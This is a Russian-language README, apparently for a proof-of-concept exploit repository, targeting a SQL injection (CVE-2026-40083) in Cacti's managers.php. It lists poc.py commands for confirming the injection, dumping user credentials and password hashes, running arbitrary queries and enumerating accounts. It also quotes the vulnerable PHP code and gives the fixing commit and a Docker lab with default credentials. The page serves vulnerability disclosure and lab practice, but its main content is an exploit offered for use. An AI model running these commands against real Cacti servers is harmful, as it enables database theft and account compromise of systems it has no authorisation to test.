Эксплойт proof-of-concept для CVE-2026-40083, SQL-инъекции в Cacti managers.php, позволяющей аутентифицированным пользователям извлекать базы данных MySQL, учетные данные пользователей и хэши паролей. Включает Docker-лабораторию для тестирования.
Эксплойт proof-of-concept для CVE-2026-40083, уязвимости SQL-инъекции в managers.php Cacti, которая позволяет любому аутентифицированному пользователю с разрешениями SNMP Manager читать всю базу данных MySQL, включая учетные данные пользователей и хеши паролей.
Использование:
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
В managers.php пользовательский ввод из selected_graphs_array десериализуется через cacti_unserialize() и напрямую вставляется в SQL без очистки:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// No validation - direct implode into SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
Параметр selected_graphs_array принимает сериализованный массив PHP. Элементы массива объединяются запятыми и напрямую вставляются в предложение IN.
POST /managers.php (action=actions, drp_action=1|2|3)
Уязвимость SQL-инъекции позволяет аутентифицированным пользователям с разрешениями SNMP Manager выполнять произвольные запросы к базе данных. Это позволяет читать таблицы, содержащие пользовательские данные, настройки, учетные данные устройств и SNMP-сообщества, а также извлекать bcrypt-хеши и API-токены, что может привести к компрометации учетных записей. Кроме того, ошибка позволяет выполнять команды с задержкой, что потенциально может вызвать отказ в обслуживании за счет исчерпания одновременных подключений к базе данных.
7.2 Высокий CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Коммит 52032e760 добавляет array_map('intval', $selected_items) перед implode для приведения всех значений к целым числам.
docker-compose up -d --build
Подождите ~30 секунд для инициализации. Доступ к Cacti по адресу http://localhost:8088
Учетные данные по умолчанию: admin / admin
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только в системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этой программой.
QuimeraX Intelligence — это продвинутая платформа EASM и киберразведки, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа активно мониторит, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быструю реакцию на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчеты, если их системы оказываются уязвимыми, что позволяет им принять меры защиты. узнать больше
Hakai Security — это компания в сфере кибербезопасности, основанная профессионалами по безопасности, приверженная техническому совершенству. Мы предлагаем индивидуальные решения по безопасности, включая продвинутое тестирование на проникновение, реалистичные симуляции Red Team и практики безопасной разработки для активной защиты активов наших клиентов от развивающихся киберугроз.
Hacking Club — это обучающая платформа, где вы изучаете кибербезопасность через практические уроки, лабораторные работы и задачи, созданные экспертами, работающими в нашей консалтинговой компании по безопасности: прямо с поля боя на ваше обучение. Практикуйтесь с уязвимостью, представленной в этом репозитории от hacking club! узнать больше